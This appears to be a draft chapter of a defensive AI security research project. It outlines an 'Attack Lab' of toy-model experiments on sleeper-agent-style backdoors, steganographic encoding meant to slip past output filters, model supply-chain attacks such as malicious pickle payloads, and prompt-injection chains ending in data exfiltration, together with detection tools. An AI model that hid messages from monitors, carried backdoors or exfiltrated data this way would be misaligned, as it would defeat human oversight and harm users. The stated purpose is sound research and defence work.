Part II · Chapter 110 PROVEN

Attack Lab

Proof-of-concept exploit code and experiments validating the threat analysis. Defensive research only.

Status Draft -- for peer review Updated 2026-03-02

Purpose

This chapter presents proof-of-concept experiments that validate (or challenge) the claims made in the research analysis. The goal is to move from “the literature says X is possible” to “here is X working on a toy model with measurable results.”

Experiment source code lives in 04-code-lab/attack-lab/. This directory contains the narrative chapter that presents and interprets the results.

Ethics and Legality

All code in this directory is for defensive security research and education only.

Experiments use small/toy models (not frontier models)
No code is designed to attack production systems or real users
Exploit demonstrations are contained and self-targeting
Results are intended for peer-reviewed publication
This work follows responsible disclosure principles

Experiment Areas

backdoor-injection/

Train small models with deliberate backdoors (sleeper-agent style). Measure:

Backdoor activation rate with and without trigger
Persistence through fine-tuning, RLHF, and quantization
Detection rates using available tools (Neural Cleanse, STRIP, etc.)

steganography/

Implement and test output encoding schemes. Measure:

Bits-per-token encoding capacity
Detectability via statistical analysis
Bandwidth vs. detectability tradeoff curve
Effectiveness of output filters against various encoding schemes

supply-chain/

Demonstrate non-weight attack vectors. Build:

Malicious pickle file with benign model behavior + payload
Tokenizer vocabulary manipulation (silent token remapping)
Config JSON auto_map hijacking
GGUF metadata injection

prompt-injection/

Build tool-using agent harnesses and test attack chains:

Indirect prompt injection via retrieved documents
Tool-chain exploitation (read -> exfiltrate)
Confused deputy attacks with authorized tools
Markdown image exfiltration

detection/

Evaluate existing detection tools against our injected backdoors:

Neural Cleanse (adapted for small transformer models)
STRIP (entropy analysis under perturbation)
Activation clustering
Statistical output analysis for steganography detection
Compare detection rates across backdoor sophistication levels

shared/

Common code used across experiments:

Model training and loading utilities
Evaluation harnesses
Statistical analysis tools
Results logging and visualization

Setup

cd 04-code-lab
bash setup.sh attack-lab       # creates .venv-attack-lab and installs deps
source .venv-attack-lab/bin/activate  # Linux/macOS
# or: .venv-attack-lab\Scripts\activate  # Windows

See 04-code-lab/requirements/attack-lab.txt for the full dependency list.

Requirements

Python 3.10+
PyTorch >= 2.0
Transformers >= 4.36 (Hugging Face)
See 04-code-lab/requirements/attack-lab.txt for complete list
Additional per-experiment dependencies documented in each subdirectory README

Each experiment subdirectory will contain its own README with specific setup, methodology, expected results, and what it proves or disproves from the research analysis.